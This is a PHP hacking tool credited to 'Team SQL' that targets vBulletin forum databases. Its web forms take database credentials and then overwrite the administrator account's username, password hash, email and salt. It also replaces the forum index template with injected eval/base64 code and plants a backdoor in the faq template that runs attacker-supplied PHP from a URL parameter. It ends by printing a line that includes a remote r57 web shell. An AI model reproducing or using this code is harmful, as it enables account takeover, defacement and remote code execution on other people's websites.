1 ottobre 2010

<?php
/*
   |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
 |.|###################################################|.|
 |.|#                                                 #|.|
 |.|#  <==-|Team SQL|-==> - <==-|9q-Live.Com *-* SQL@Live.se-==>       #|.|
 |.|#             WWW.TEAM-SQL.COM                  #|.|
 |.|###################################################|.|
   |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
*/
?>
<html><style>
input, select, textarea {
background-color: #000000;
border-style: #7a7c7d;
border-width: 1px;
font-family: verdana, arial, sans-serif;
font-size: 11px;
color: #FF0000;
padding: 0px;
}
A:link {
COLOR:#FF0000; TEXT-DECORATION: none
}
A:visited {
COLOR:#A2A2A2; TEXT-DECORATION: none
}
A:active {
COLOR:#787878; TEXT-DECORATION: none
}
A:hover {
color:#FF0000;TEXT-DECORATION: none
}
</style>
<head>
  <title>Change admin data,Change All pages & shell (faq.php) For Forum</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
       <body bgcolor="black" text="#7a7c7d">
       <div align="center">
      <H2><u>Team<strong>SQL</strong>Mahmoud</u></H2>
|  <a href="mailto:SQL@Live.se">SQL(AT)Live(DoT)Se</a>  |<br>
<u>Change admin data,Change All pages & shell (faq.php) For Forum </u>
<br><br>
      <?
if(empty($_POST['ur'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
      <br>
<textarea name=\"ur\" cols=\"3\" rows=\"1\">kid</textarea><br>
<text name=\"kid\" >username : kid</text><br>
<text name=\"kid\" >pass : qazwsx</text><br>
<text name=\"kid\" >email : SQL@Live.se</text><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$ur     = $_POST['ur']['ps']['em']['st'];
         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());

$index=str_replace("\'","'",$ur);
$set_ur .= "kid";
$ok=@mysql_query("UPDATE user SET username ='".$set_ur."' WHERE userid ='1'") or die(mysql_error());

$index=str_replace("\'","'",$ps);
$set_ps .= "d6723ced98897149d9ecf629e1694d17";
$ok=@mysql_query("UPDATE user SET password ='".$set_ps."' WHERE userid ='1'") or die(mysql_error());

$index=str_replace("\'","'",$em);
$set_em .= "Nz@hotmail.com";
$ok=@mysql_query("UPDATE user SET email ='".$set_em."' WHERE userid ='1'") or die(mysql_error());

$index=str_replace("\'","'",$st);
$set_st .= "kid";
$ok=@mysql_query("UPDATE user SET salt ='".$set_st."' WHERE userid ='1'") or die(mysql_error());

if($ok){
echo "!! update finish !!<br><br>";
}
}

if(empty($_POST['index'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
      <br>
<textarea name=\"index\" cols=\"40\" rows=\"10\">Set Your Index</textarea><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$index     = $_POST['index'];
         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index  = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}
}

if(empty($_POST['faq'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
      <br>
<textarea name=\"faq\" cols=\"40\" rows=\"10\">Set shell TrYaG Team</textarea><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$faq     = $_POST['faq'];
         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());

$index=str_replace("\'","'",$faq);
$set_faq .= ("$faq");
$set_faq .= " ";
$ok=@mysql_query("UPDATE template SET template ='".$set_faq."' WHERE title ='faq'") or die(mysql_error());

if($ok){
echo "!! update finish !!<br><br>";
}

}

if(empty($_POST['inc'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
   <br>
<textarea name=\"inc\" cols=\"40\" rows=\"2\">{\${eval(\$_GET[kid])}}</textarea><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$inc     = $_POST['inc'];
         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$inc);
$set_inc  = "\$spacer_open
{\${eval(base64_decode(\'";
$set_inc .= base64_encode("echo \"$inc\";");
$set_inc .= "\'))}}{\${exit()}}&
\$_phpinclude_output";
$ok=@mysql_query("UPDATE template SET template ='".$set_inc."' WHERE title ='faq'") or die(mysql_error());
if($ok){
echo "faq.php?kid=include('http://localhost/shell/r57.txt');<br><br>";}
}
# Footer
echo "<strong>SpeciaL GreeTz To :</strong> <u> Mr.Sohayl ^_^ Mahmoud ^_^ Mr Danger</u>";

?>

agenda